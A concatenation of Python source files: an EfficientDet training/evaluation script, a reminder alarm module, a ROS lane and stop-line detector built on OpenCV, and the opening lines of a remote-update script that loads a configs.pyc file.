'ground truth from the dataloader. Ignored if testdev_dir is not None.')
flags.DEFINE_string('testdev_dir', None,
'COCO testdev dir. If not None, ignorer val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_string('mode', 'train',
'Mode to run: train or eval (default: train)')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_training', False, 'Run one eval after the '
'training finishes.')
flags.DEFINE_integer(
'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 180,
'Minimum seconds between evaluations.')
flags.DEFINE_integer(
'eval_timeout', None,
'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
flags.DEFINE_bool(
'run_epoch_in_child_process', True,
'This option helps to rectify CPU memory leak. If set to True then every '
'epoch iteration is run in a separate process '
'for train_and_eval mode and the memory is cleared after each epoch.\n'
'Drawback: you need to kill 2 processes instead of one if '
'you want to interrupt training')
FLAGS = flags.FLAGS
def main(_):
if FLAGS.strategy == 'horovod':
import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top
logging.info('Use horovod with multi gpus')
hvd.init()
os.environ['CUDA_VISIBLE_DEVICES'] = str(hvd.local_rank())
import tensorflow.compat.v1 as tf # pylint: disable=g-import-not-at-top
tf.enable_v2_tensorshape()
tf.disable_eager_execution()
if FLAGS.strategy == 'tpu':
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
tpu_grpc_url = tpu_cluster_resolver.get_master()
tf.Session.reset(tpu_grpc_url)
else:
tpu_cluster_resolver = None
# Check data path
if FLAGS.mode in ('train',
'train_and_eval') and FLAGS.training_file_pattern is None:
raise RuntimeError('You must specify --training_file_pattern for training.')
if FLAGS.mode in ('eval', 'train_and_eval'):
if FLAGS.validation_file_pattern is None:
raise RuntimeError('You must specify --validation_file_pattern '
'for evaluation.')
# Parse and override hparams
config = hparams_config.get_detection_config(FLAGS.model_name)
config.override(FLAGS.hparams)
if FLAGS.num_epochs: # NOTE: remove this flag after updating all docs.
config.num_epochs = FLAGS.num_epochs
# Parse image size in case it is in string format.
config.image_size = utils.parse_image_size(config.image_size)
# The following is for spatial partitioning. `features` has one tensor while
# `labels` had 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
# partition is performed on `features` and all partitionable tensors of
# `labels`, see the partition logic below.
# In the TPUEstimator context, the meaning of `shard` and `replica` is the
# same; follwing the API, here has mixed use of both.
if FLAGS.use_spatial_partition:
# Checks input_partition_dims agrees with num_cores_per_replica.
if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
raise RuntimeError('--num_cores_per_replica must be a product of array'
'elements in --input_partition_dims.')
labels_partition_dims = {
'mean_num_positives': None,
'source_ids': None,
'groundtruth_data': None,
'image_scales': None,
}
# The Input Partition Logic: We partition only the partition-able tensors.
# Spatial partition requires that the to-be-partitioned tensors must have a
# dimension that is a multiple of `partition_dims`. Depending on the
# `partition_dims` and the `image_size` and the `max_level` in config, some
# high-level anchor labels (i.e., `cls_targets` and `box_targets`) cannot
# be partitioned. For example, when `partition_dims` is [1, 4, 2, 1], image
# size is 1536, `max_level` is 9, `cls_targets_8` has a shape of
# [batch_size, 6, 6, 9], which cannot be partitioned (6 % 4 != 0). In this
# case, the level-8 and level-9 target tensors are not partition-able, and
# the highest partition-able level is 7.
feat_sizes = utils.get_feat_sizes(
config.get('image_size'), config.get('max_level'))
for level in range(config.get('min_level'), config.get('max_level') + 1):
def _can_partition(spatial_dim):
partitionable_index = np.where(
spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)
spatial_dim = feat_sizes[level]
if _can_partition(spatial_dim['height']) and _can_partition(
spatial_dim['width']):
labels_partition_dims['box_targets_%d' %
level] = FLAGS.input_partition_dims
labels_partition_dims['cls_targets_%d' %
level] = FLAGS.input_partition_dims
else:
labels_partition_dims['box_targets_%d' % level] = None
labels_partition_dims['cls_targets_%d' % level] = None
num_cores_per_replica = FLAGS.num_cores_per_replica
input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
num_shards = FLAGS.num_cores // num_cores_per_replica
else:
num_cores_per_replica = None
input_partition_dims = None
num_shards = FLAGS.num_cores
params = dict(
config.as_dict(),
model_name=FLAGS.model_name,
iterations_per_loop=FLAGS.iterations_per_loop,
model_dir=FLAGS.model_dir,
num_shards=num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
strategy=FLAGS.strategy,
backbone_ckpt=FLAGS.backbone_ckpt,
ckpt=FLAGS.ckpt,
val_json_file=FLAGS.val_json_file,
testdev_dir=FLAGS.testdev_dir,
mode=FLAGS.mode)
config_proto = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False)
if FLAGS.strategy != 'tpu':
if FLAGS.use_xla:
config_proto.graph_options.optimizer_options.global_jit_level = (
tf.OptimizerOptions.ON_1)
config_proto.gpu_options.allow_growth = True
tpu_config = tf.estimator.tpu.TPUConfig(
FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
num_cores_per_replica=num_cores_per_replica,
input_partition_dims=input_partition_dims,
per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
.PER_HOST_V2)
if FLAGS.strategy == 'horovod':
model_dir = FLAGS.model_dir if hvd.rank() == 0 else None
else:
model_dir = FLAGS.model_dir
run_config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=model_dir,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
tpu_config=tpu_config,
tf_random_seed=FLAGS.tf_random_seed,
)
model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
max_instances_per_image = config.max_instances_per_image
eval_steps = int(FLAGS.eval_samples // FLAGS.eval_batch_size)
use_tpu = (FLAGS.strategy == 'tpu')
logging.info(params)
def _train(steps):
"""Build train estimator and run training if steps > 0."""
train_estimator = tf.estimator.tpu.TPUEstimator(
model_fn=model_fn_instance,
use_tpu=use_tpu,
train_batch_size=FLAGS.train_batch_size,
config=run_config,
params=params)
train_estimator.train(
input_fn=dataloader.InputReader(
FLAGS.training_file_pattern,
is_training=True,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image),
max_steps=steps)
def _eval(steps):
"""Build estimator and eval the latest checkpoint if steps > 0."""
eval_params = dict(
params,
strategy=FLAGS.strategy,
input_rand_hflip=False,
is_training_bn=False,
)
eval_estimator = tf.estimator.tpu.TPUEstimator(
model_fn=model_fn_instance,
use_tpu=use_tpu,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size,
config=run_config,
params=eval_params)
eval_results = eval_estimator.evaluate(
input_fn=dataloader.InputReader(
FLAGS.validation_file_pattern,
is_training=False,
max_instances_per_image=max_instances_per_image),
steps=steps,
name=FLAGS.eval_name)
logging.info('Evaluation results: %s', eval_results)
return eval_results
# start train/eval flow.
if FLAGS.mode == 'train':
total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
_train(total_examples // FLAGS.train_batch_size)
if FLAGS.eval_after_training:
_eval(eval_steps)
elif FLAGS.mode == 'eval':
# Run evaluation when there's a new checkpoint
for ckpt in tf.train.checkpoints_iterator(
FLAGS.model_dir,
min_interval_secs=FLAGS.min_eval_interval,
timeout=FLAGS.eval_timeout):
logging.info('Starting to evaluate.')
try:
eval_results = _eval(eval_steps)
# Terminate eval job when final checkpoint is reached.
try:
current_step = int(os.path.basename(ckpt).split('-')[1])
except IndexError:
logging.info('%s has no global step info: stop!', ckpt)
break
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
total_step = int((config.num_epochs * FLAGS.num_examples_per_epoch) /
FLAGS.train_batch_size)
if current_step >= total_step:
logging.info('Evaluation finished after training step %d',
current_step)
break
except tf.errors.NotFoundError:
# Since the coordinator is on a different job than the TPU worker,
# sometimes the TPU worker does not finish initializing until long after
# the CPU job tells it to start evaluating. In this case, the checkpoint
# file could have been deleted already.
logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
elif FLAGS.mode == 'train_and_eval':
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
if not ckpt:
ckpt = tf.train.latest_checkpoint(FLAGS.ckpt)
try:
step = int(os.path.basename(ckpt).split("-")[1])
current_epoch = (
step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
except (IndexError, TypeError):
logging.info("Folder has no ckpt with valid step.", FLAGS.model_dir)
current_epoch = 0
epochs_per_cycle = 1 # higher number has less graph construction overhead.
def run_train_and_eval(e):
print('-----------------------------------------------------\n'
'=====> Starting training, epoch: %d.' % e)
_train(e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
print('-----------------------------------------------------\n'
'=====> Starting evaluation, epoch: %d.' % e)
eval_results = _eval(eval_steps)
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
if FLAGS.run_epoch_in_child_process:
p = multiprocessing.Process(target=partial(run_train_and_eval, e=e))
p.start()
p.join()
else:
run_train_and_eval(e)
else:
logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
app.run(main)
|
reminder.py | import time
import keyboard
from playsound import playsound
import threading
def remainder_alarm(text, timeremind):
print("thread running..")
local_time = float(timeremind)
local_time = local_time * 60
time.sleep(local_time)
print(text)
print("Press Space to stop")
while True:
playsound("./sounds/ffact.wav")
time.sleep(0.5)
if keyboard.is_pressed('space'):
break
return
def find_time_desp(query):
HH = 0
MM = 0
D = ''
desp = query.split('about')[1].replace(
'after', '', 1).strip().replace(' ', ' ', 1)
# print(desp)
for i in desp:
if i.isdigit():
break
D += str(i)
tdata = query.split()
# print(tdata)
try:
hindex = tdata.index('hour')
except ValueError:
hindex = 0
try:
if query.find('minutes') >= 0:
mindex = tdata.index('minutes')
if query.find('minute') >= 0:
mindex = tdata.index('minute')
except ValueError:
mindex = 0
try:
HH = int(tdata[hindex-1]) if hindex > 0 else 0
MM = int(tdata[mindex-1]) if mindex > 0 else 0
except:
HH = 0
MM = 0
return D.strip(), int(HH) * 60 + int(MM)
def remainder_init(text, time):
t1 = threading.Thread(target=remainder_alarm, args=(text, time))
t1.start()
# dd, x = find_time_desp("remind me about xyz and abc after 20 minute")
# print(dd, x)
|
sunny_new_red_line_detect_simple_gazebo.py | #!/usr/bin/env python
from cv_bridge import CvBridge, CvBridgeError
from duckietown_utils.jpg import image_cv_from_jpg #location:f23-LED/led_detection/include
import threading
import rospy
import numpy as np
import cv2
import math
from sensor_msgs.msg import CompressedImage, Image
from ino_car.msg import LaneLine, LaneLines
class LineDetectorNode(object):
def __init__(self):
self.node_name = "LineDetectorNode"
self.verbose = None
# Thread lock
self.thread_lock = threading.Lock()
# Constructor of line detector
self.bridge = CvBridge()
# Publishers
self.pub_image = rospy.Publisher("~image_with_lines", Image, queue_size=1)
self.pub_lines = rospy.Publisher("~segment_list", LaneLines, queue_size=1)
# Subscribers
self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
#------------------------------------------
self.bottom_width = 0.85 # width of bottom edge of trapezoid, expressed as percentage of image width
self.top_width = 0.75 # ditto for top edge of trapezoid
self.height = 0.4 # height of the trapezoid expressed as percentage of image height
self.height_from_bottom = 0.05 # height from bottom as percentage of image height
self.x_translation = -0.01 # Can be +ve or -ve. Translation of midpoint of region of interest along x axis
self.center =[0,0]
self.hasleft= False
self.hasright = False
self.lanewidth =400
# -----------------------------------------
#color
self.hsv_white1= np.array([0,0,150])
self.hsv_white2= np.array([180,50,255])
self.hsv_yellow1= np.array([25,120,90])
self.hsv_yellow2= np.array([45,255,255])
self.hsv_red1= np.array([0,140,100])
self.hsv_red2= np.array([15,255,255])
self.hsv_red3= np.array([165,140,100])
self.hsv_red4= np.array([180,255,255])
self.dilation_kernel_size = 3
#----------------------------------------
def _colorFilter(self,hsv,color):
# threshold colors in HSV space
bw_red = cv2.inRange(hsv, self.hsv_red1, self.hsv_red2)
bw_white = cv2.inRange(hsv, self.hsv_white1, self.hsv_white2)
bw_yellow = cv2.inRange(hsv, self.hsv_yellow1, self.hsv_yellow2)
if color == 'white':
bw = bw_white
elif color == 'yellow':
bw = bw_yellow
elif color == 'red':
bw = bw_red
# binary dilation
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(self.dilation_kernel_size, self.dilation_kernel_size))
bw = cv2.dilate(bw, kernel)
if self.verbose:
color_segments = self.color_segment(bw_white,bw_red,bw_yellow)
else:
color_segments = []
return bw, color_segments
def detectLines(self,img,color,img_shape):
lines = self.hough_transform(img)
# Removing horizontal lines detected from hough transform
lane_lines = self.filter_horizontal_short_lines(lines)
# Separating lines on left and right side of the highway lane
lane_lines_=[]
## STOP ##
if color == 'red':
red_lane_lines = self.filter_vertical_short_lines(lines)
if red_lane_lines is None:
return None,None
red_lane_line = self.draw_single_red_line( red_lane_lines )
return red_lane_line, red_lane_lines
if color == 'yellow':
if lane_lines is None:
return None,None
for l in lane_lines:
lane_lines_ += [(l[0][0], l[0][1], l[0][2], l[0][3])]
lane_line = self.draw_single_line(lane_lines_ ,img_shape)
return lane_line,lane_lines
if color == 'white':
if lane_lines is None:
print 'no white'
return None,None,None
for l in lane_lines:
lane_lines_ += [(l[0][0], l[0][1], l[0][2], l[0][3])]
left_lines,right_lines = self.separate_white_lines(lane_lines_)
right_lane_line = self.draw_single_line( right_lines,img_shape )
left_lane_line = self.draw_single_line( left_lines,img_shape )
return left_lane_line ,right_lane_line ,lane_lines
def filter_horizontal_short_lines(self,lines):
"""
1.Removes all lines with slope between -10 and +10 degrees
This is done because for highway lane lines the lines will be closer to being
vertical from the view of the front mounted camera
2.Removes too sho = []rt
"""
if lines is None:
return
#for l in lines:
# dist = math.sqrt( (l[0][2] - l[0][0])**2 + (l[0][3] - l[0][1])**2 )
# print dist
non_short_lines = [l for l in lines if
not math.sqrt( (l[0][2] - l[0][0])**2 + (l[0][3] - l[0][1])**2 ) < 20]
non_vertical_lines = [l for l in non_short_lines if
not float(l[0][2] - l[0][0]) == 0]
vertical_lines = [l for l in lines if
float(l[0][2] - l[0][0]) == 0]
non_horizontal_lines = [l for l in non_vertical_lines if
not -10 <= np.rad2deg(np.arctan(float(l[0][3] - l[0][1]) /float(l[0][2] - l[0][0])) ) <= 10]
if len(vertical_lines) != 0 :
for v in vertical_lines:
non_horizontal_lines.append(v)
non_horizontal_lines = np.array(non_horizontal_lines)
return non_horizontal_lines
## STOP ##
def filter_vertical_short_lines(self,lines):
"""
1.Keep all lines with slope between -10 and +10 degrees
2.Removes too short
"""
if lines is None:
return
horizontal_lines = []
#for l in lines:
# dist = math.sqrt( (l[0][2] - l[0][0])**2 + (l[0][3] - l[0][1])**2 )
# print dist
non_short_lines = [l for l in lines if
not math.sqrt( (l[0][2] - l[0][0])**2 + (l[0][3] - l[0][1])**2 ) < 1]
non_vertical_lines = [l for l in non_short_lines if
not float(l[0][2] - l[0][0]) == 0]
for l in non_vertical_lines:
if -10 <= np.rad2deg(np.arctan(float(l[0][3] - l[0][1]) /float(l[0][2] - l[0][0])) ) <= 10:
horizontal_lines +=[(l[0][0], l[0][1], l[0][2], l[0][3])]
return horizontal_lines
def cbImage(self, image_msg):
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start() #start execution
# Returns rightaway
def loginfo(self, s):
rospy.loginfo('[%s] %s' % (self.node_name, s))
# generate color segments
def color_segment(area_white, area_red, area_yellow):
B, G, R = 0, 1, 2
def white(x):
x = cv2.cvtColor(x, cv2.COLOR_GRAY2BGR)
return x
def red(x):
x = cv2.cvtColor(x, cv2.COLOR_GRAY2BGR)
x[:,:,R] *= 1
x[:,:,G] *= 0
x[:,:,B] *= 0
return x
def yellow(x):
x = cv2.cvtColor(x, cv2.COLOR_GRAY2BGR)
x[:,:,R] *= 1
x[:,:,G] *= 1
x[:,:,B] *= 0
return x
h, w = area_white.shape
orig = [area_white, area_red, area_yellow]
masks = [white(area_white), red(area_red), yellow(area_yellow)]
res = np.zeros((h,w,3), dtype=np.uint8)
for i, m in enumerate(masks):
nz = (orig[i] > 0) * 1.0
assert nz.shape == (h, w), nz.shape
for j in [0, 1, 2]:
res[:,:,j] = (1-nz) * res[:,:,j].copy() + (nz) * m[:,:,j]
return res
def canny_edge_median(self,img):
"""canny_edge_median takes an image and does auto-thresholding
using median to compute the edges using canny edge technique
"""
median = np.median(img)
low_threshold = median * 0.66
upper_threshold = median * 1.33
return cv2.Canny(img, low_threshold, upper_threshold)
def region_of_interest(self,img, vertices):
"""
Only keeps the part of the image enclosed in the polygon and
sets rest of the image to black
"""
mask = np.zeros_like(img)
mask_color = 255
# filling pixels inside the polygon defined by "vertices" with the fill color
cv2.fillPoly(mask, vertices, mask_color)
# returning the image only where mask pixels are nonzero
masked_image = cv2.bitwise_and(img, mask)
return masked_image, mask
def highway_lane_lines(self,img,img_shape ):
"""
Computes hough transform, separates lines on left and right side of the highway lane computed
by hough transform, then forms a single line on the right side and left side
"""
# Computing lines with hough transform
lines = self.hough_transform(img)
if lines is None:
return None,None,None
# Removing horizontal lines detected from hough transform
lane_lines = self.filter_horizontal_lines(lines)
# Separating lines on left and right side of the highway lane
left_lines, right_lines = self.separate_lines(lane_lines)
# Filtering lines i.e. removing left lines that are closer to right side and vice versa
left_lines, right_lines = self.filter_lane_lines(left_lines, right_lines,)
# Computing one single line for left and right side
left_side_line = self.draw_single_line(left_lines,img_shape )
right_side_line = self.draw_single_line(right_lines,img_shape )
return left_side_line, right_side_line,lines
#return left_lines, right_lines,lane_lines
def hough_transform(self,img):
"""
Computes lines using the probabilistic hough transform provided by OpenCV
Thus it computes lines of finite size and returns them in form of an array
:param img: masked edge detected image with only region of interest
:return:
"""
# Parameters
rho = 2 # distance resolution in pixels of the Hough grid
theta = 1 * np.pi / 18 # angular resolution in radians of the Hough grid
threshold = 10 # minimum number of votes (intersections in Hough grid cell)
min_line_length = 10 # m0inimum number of pixels making up a line
max_line_gap = 15 # maximu gap in pixels between connectable line segments
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_length,
maxLineGap=max_line_gap)
return lines
def filter_horizontal_lines(self,lines):
"""
Removes all lines with slope between -10 and +10 degrees
This is done because for highway lane lines the lines will be closer to being
vertical from the view of the front mounted camera
"""
if lines is None:
return
non_horizontal_lines = [l for l in lines if
not -10 <= np.rad2deg(np.arctan(float((l[0][3] - l[0][1])) / 0.0001*float((l[0][2] - l[0][0])))) <= 10]
non_horizontal_lines = np.array(non_horizontal_lines)
return non_horizontal_lines
def separate_white_lines(self,lines):
"""
Separates the left and right white lines of the highway lane
:param lines: an array containing the lines which make left and right side of highway lane
"""
if lines is None:
return
x_m=0
for x1, y1, x2, y2 in lines:
x_m += x1
x_m += x2
x_m = x_m/2
right_lines = [l for l in lines if l[0] >= x_m]
left_lines = [l for l in lines if l[0] < x_m]
return left_lines,right_lines
def separate_lines(self,lines):
"""
Separates the left and right lines of the highway lane
:param lines: an array containing the lines which make left and right side of highway lane
"""
left_lines = []
right_lines = []
# Here we separate coordinates of left and right-side lines of the highway lane
# Since the y-axis is positive in downwards direction and x-axis is positive in right hand direction
# With origin at the top left corner of the image
# A negative slope will mean that the line is on the left ( in normal coordinate system it
# will mean on the right side)
# A positive slope will mean that the line is on the right ( in normal coordinate system it
# will mean on the left side)
for l in lines:
slope = float((l[0][3] - l[0][1])) / 0.0001+float((l[0][2] - l[0][0]))
if slope < 0:
# Slope is negative hence line is on the left side
left_lines += [(l[0][0], l[0][1], l[0][2], l[0][3])]
elif slope > 0:
# Slope is positive hence line is on the right side
right_lines += [(l[0][0], l[0][1], l[0][2], l[0][3])]
else:
print("Something looks fishy here")
return left_lines, right_lines
def filter_lane_lines(self,left_lines, right_lines):
"""
This function removes lines from left_lines that are closer to the right-side of the highway lane
and from right_lines removes lines that are closer to left-side of highway lane. It also removes
the lines which are more or less than 10 degrees from the median slope of each side.
"""
if len(left_lines) == 0 or len(right_lines) == 0:
return left_lines, right_lines
# Filtering lines that lie close to the other side, for instance
# lines in left_lines array that are closer to the right lane line
x_top_left = []
for x1, y1, x2, y2 in left_lines:
x_top_left += [x2]
x_top_left_median = np.median(x_top_left)
left_lines_final = [l for l in left_lines if l[2] <= x_top_left_median]
slope_left_lines = []
for x1, y1, x2, y2 in left_lines_final:
slope_left_lines += [np.rad2deg(np.arctan((y2 - y1) / (x2 - x1)))]
x_top_right = []
for x1, y1, x2, y2 in right_lines:
x_top_right += [x1]
x_top_right_median = np.median(x_top_right)
right_lines_final = [l for l in right_lines if l[0] >= x_top_right_median]
slope_right_lines = []
for x1, y1, x2, y2 in right_lines_final:
slope_right_lines += [np.rad2deg(np.arctan((y2 - y1)/(x2 - x1)))]
# Filtering based on slope
median_left_lines_slope = np.median(slope_left_lines)
left_lines_final_filtered = []
for i in range(len(left_lines_final)):
if (-1 + median_left_lines_slope) <= slope_left_lines[i] <= (10 + median_left_lines_slope):
left_lines_final_filtered += [left_lines_final[i]]
median_right_lines_slope = np.median(slope_right_lines)
right_lines_final_filtered = []
for i in range(len(right_lines_final)):
if (-5 + median_right_lines_slope) <= slope_right_lines[i] <= (5 + median_right_lines_slope):
right_lines_final_filtered += [right_lines_final[i]]
return left_lines_final_filtered, right_lines_final_filtered
def draw_single_line(self,lines,img_shape):
"""
Takes in an array of lines and combines them into a single line
"""
if len(lines) == 0:
return None
# Maximum and minimum y-coordinate for the sigle line on left and right side
y_max = int(img_shape[0] - img_shape[0] * self.height_from_bottom)
y_min = int(img_shape[0] - img_shape[0] * self.height_from_bottom) - int(img_shape[0] * self.height)
# Computing the top and bottom x co-ordinate obtained by extrapolating
# the limited length lines.
x_top = []
x_bottom = []
for x1, y1, x2, y2 in lines:
z = np.polyfit([x1, x2], [y1, y2], 1)
m, c = z
x_top.append(int((y_min - c) / m))
x_bottom.append(int((y_max - c) / m))
x_avg_top = np.int(np.median(x_top))
x_avg_bottom = np.int(np.median(x_bottom))
return [x_avg_bottom, y_max, x_avg_top, y_min]
## STOP ##
def draw_single_red_line(self,lines):
"""
Takes in an array of lines and combines them into a single line
"""
if len(lines) == 0:
return None
# Computing the top and bottom x co-ordinate obtained by extrapolating
# the limited length lines.
x_top = []
x_bottom = []
y_top = []
y_bottom = []
for x1, y1, x2, y2 in lines:
z = np.polyfit([x1, x2], [y1, y2], 1) #line fit
a, b = z
x_top.append(int(x1))
x_bottom.append(int(x2))
y_top.append(int(y1))
y_bottom.append(int(y2))
x_avg_top = np.int(np.median(x_top))
x_avg_bottom = np.int(np.median(x_bottom)) #average
y_avg_top = np.int(np.median(y_top))
y_avg_bottom = np.int(np.median(y_bottom)) #average
return [x_avg_bottom, y_avg_bottom, x_avg_top, y_avg_top]
def compute_mask_vertices(self,img_shape):
"""
This function takes an image as input, requires the parameters to be set manually
and generates the coordinates for the mask vertices.
"""
vertices = np.array(
[[[(img_shape[1] * (1 - self.bottom_width)) // 2, int(img_shape[0] - img_shape[0] * self.height_from_bottom)],
[int(img_shape[1] *self.bottom_width) + (img_shape[1] * (1 - self.bottom_width)) // 2,
int(img_shape[0] - img_shape[0] * self.height_from_bottom)],
[int(img_shape[1] * self.top_width) + (img_shape[1] * (1 - self.top_width)) // 2,
int(img_shape[0] - img_shape[0] * self.height_from_bottom) - int(img_shape[0] * self.height)],
[(img_shape[1] * (1 - self.top_width)) // 2,
int(img_shape[0] - img_shape[0] * self.height_from_bottom) - int(img_shape[0] * self.height)]]],
dtype=np.int32)
vertices = np.array(vertices[:] - [self.x_translation * img_shape[1], 0], dtype='int')
return vertices
def processImage(self, image_msg):
if not self.thread_lock.acquire(False):
# Return immediately if the thread is locked
return
try:
self.processImage_(image_msg)
finally:
# Release the thread lock
self.thread_lock.release()
def processImage_(self, image_msg):
# Decode from compressed image with OpenCV
try:
image_cv = image_cv_from_jpg(image_msg.data)
except ValueError as e:
self.loginfo('Could not decode image: %s' % e)
return
# Resize and crop image
hei_original, wid_original = image_cv.shape[0:2]
gray = cv2.cvtColor(image_cv, cv2.COLOR_BGR2GRAY)
# Applying gaussian blur
blur = cv2.GaussianBlur(gray, (5, 5), 0)
# color
hsv = cv2.cvtColor(image_cv, cv2.COLOR_BGR2HSV)
white, color_segments = self._colorFilter(hsv,'white') #hsv: white/black image color_segments: color space with color
yellow, color_segments = self._colorFilter(hsv,'yellow')
## STOP ##
red, color_segments = self._colorFilter(hsv,'red')
# Computing edges
img_edges = self.canny_edge_median(blur)
# Computing region of interest
img_shape = gray.shape
my_vertices = self.compute_mask_vertices(img_shape)
masked_image, mask = self.region_of_interest(img_edges, my_vertices)
#bitwise edge, color, mask
edge_yellow = cv2.bitwise_and(yellow, masked_image)
edge_white = cv2.bitwise_and(white, masked_image)
## STOP ##
edge_red = cv2.bitwise_and(red, masked_image)
# Computing lane lines
right_white_line,left_white_line, white_lines = self.detectLines(edge_white,'white',img_shape) #the order of right and left have to exchange because the different coordinate of image frame and the normal frame
yellow_line, yellow_lines = self.detectLines(edge_yellow,'yellow',img_shape)
## STOP ##
red_line, red_lines = self.detectLines(edge_red,'red',img_shape)
# handle two white line at same side
if left_white_line and right_white_line:
if ((left_white_line[0]-left_white_line[2])/2 - (yellow_line[0]- yellow_line[2])/2) > 0:
right_white_line = map(lambda x: x/2, list(np.array(right_white_line)+np.array(left_white_line)))
left_white_line = None
if yellow_line and right_white_line:
if (yellow_line[0]+yellow_line[2]) - (right_white_line[0] +right_white_line[2]) > self.lanewidth:
right_white_line = None
if yellow_line and right_white_line:
if (yellow_line[0]+yellow_line[2]) > (right_white_line[0] +right_white_line[2]):
yellow_line = None
# SegmentList constructor
segmentList = LaneLines()
segmentList.header.stamp = image_msg.header.stamp
image_with_lines = np.copy(image_cv)
# draw line on image_With_line
if yellow_line is not None:
cv2.line(image_with_lines, (yellow_line[0], yellow_line[1]), (yellow_line[2], yellow_line[3]), (0, 255, 0), 5)
self.hasleft = True
segmentList.lanelines.extend(self.toSegmentMsg(yellow_line,LaneLine.LEFT))
if right_white_line is not None:
cv2.line(image_with_lines, (right_white_line[0], right_white_line[1]), (right_white_line[2], right_white_line[3]), (0, 0, 255), 5)
self.hasright = True
segmentList.lanelines.extend(self.toSegmentMsg(right_white_line,LaneLine.RIGHT))
## STOP#
if red_line is not None:
segmentList.lanelines.extend(self.toSegmentMsg(red_line,LaneLine.STOP))
cv2.line(image_with_lines, (red_line[0],red_line[1]), (red_line[2], red_line[3]), (0, 255, 0), 5)
# Publish segmentList
self.pub_lines.publish(segmentList)
# plot on image_With_line
if white_lines is not None:
for i,pl in enumerate(white_lines):
cv2.line(image_with_lines, (pl[0][0], pl[0][1]), (pl[0][2], pl[0][3]), (255, 0, 0),2)
if yellow_lines is not None:
for i,pl in enumerate(yellow_lines):
cv2.line(image_with_lines, (pl[0][0], pl[0][1]), (pl[0][2], pl[0][3]), (255, 0, 0),2)
'''
if self.hasleft and self.hasright:
self.center[0] = (final_left_line[0]+final_right_line[0]+final_left_line[2] +final_right_line[2])/4
self.center[1] = (final_left_line[1]+final_right_line[1]+final_left_line[3] +final_right_line[3])/4
cv2.circle(image_with_lines, (self.center[0] ,self.center[1]), 3, (0,255,255), thickness=3, lineType=8, shift=0)
self.hasleft = False
self.hasright = False
if self.hasleft and not self.hasright:
self.center[0] = (final_left_line[0]+final_left_line[2] )/2 + self.lanewidth/2
self.center[1] = (final_left_line[1]+final_left_line[3] )/2
cv2.circle(image_with_lines, (self.center[0] ,self.center[1]), 3, (0,255,255), thickness=3, lineType=8, shift=0)
self.hasleft = False
self.hasright = False
if not self.hasleft and self.hasright:
self.center[0] = (final_right_line[0]+final_right_line[2] )/2 - self.lanewidth/2
self.center[1] = (final_right_line[1]+final_right_line[3] )/2
cv2.circle(image_with_lines, (self.center[0] ,self.center[1]), 3, (0,255,255), thickness=3, lineType=8, shift=0)
self.hasleft = False
self.hasright = False
'''
cv2.polylines(image_with_lines,my_vertices,True,(0,255,255))
# Publish the frame with lines
image_msg_out = self.bridge.cv2_to_imgmsg(image_with_lines, "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image.publish(image_msg_out)
def toSegmentMsg(self, line, side):
segmentMsgList = []
segment = LaneLine()
segment.side = side
segment.pixels_line[0].x = line[0]
segment.pixels_line[0].y = line[1]
segment.pixels_line[1].x = line[2]
segment.pixels_line[1].y = line[3]
segmentMsgList.append(segment)
return segmentMsgList
def onShutdown(self):
self.loginfo("Shutdown.")
if __name__ == '__main__':
rospy.init_node('line_detector',anonymous=False)
line_detector_node = LineDetectorNode()
rospy.on_shutdown(line_detector_node.onShutdown)
rospy.spin()
|
Update_Internal_Remotly.py | from wakeonlan import send_magic_packet
from fabric import Connection
import marshal
import types
import threading
from queue import Queue
import socket
import time
import base64
import sys
import paramiko.ssh_exception
def starting_module(c_q):
print("###########################################")
print("## UPDATE INTERNAL - V3.0 ##")
print("## AUTHOR - MAFIOSI ##")
print("###########################################")
print()
print("[WARNING] DO NOT CLOSE THE PROGRAM WHILE IT'S RUNNING")
time.sleep(2)
print()
print("[STATE] Checking file configs.pyc availability....")
try:
s = open('configs.pyc', 'rb')
print("[RESULT] File configs.pyc found")
print()
except:
print("[RESULT] Move file configs.pyc to the same folder as this EXECUTABLE")
c_q.put(2)
return
s.seek(12)
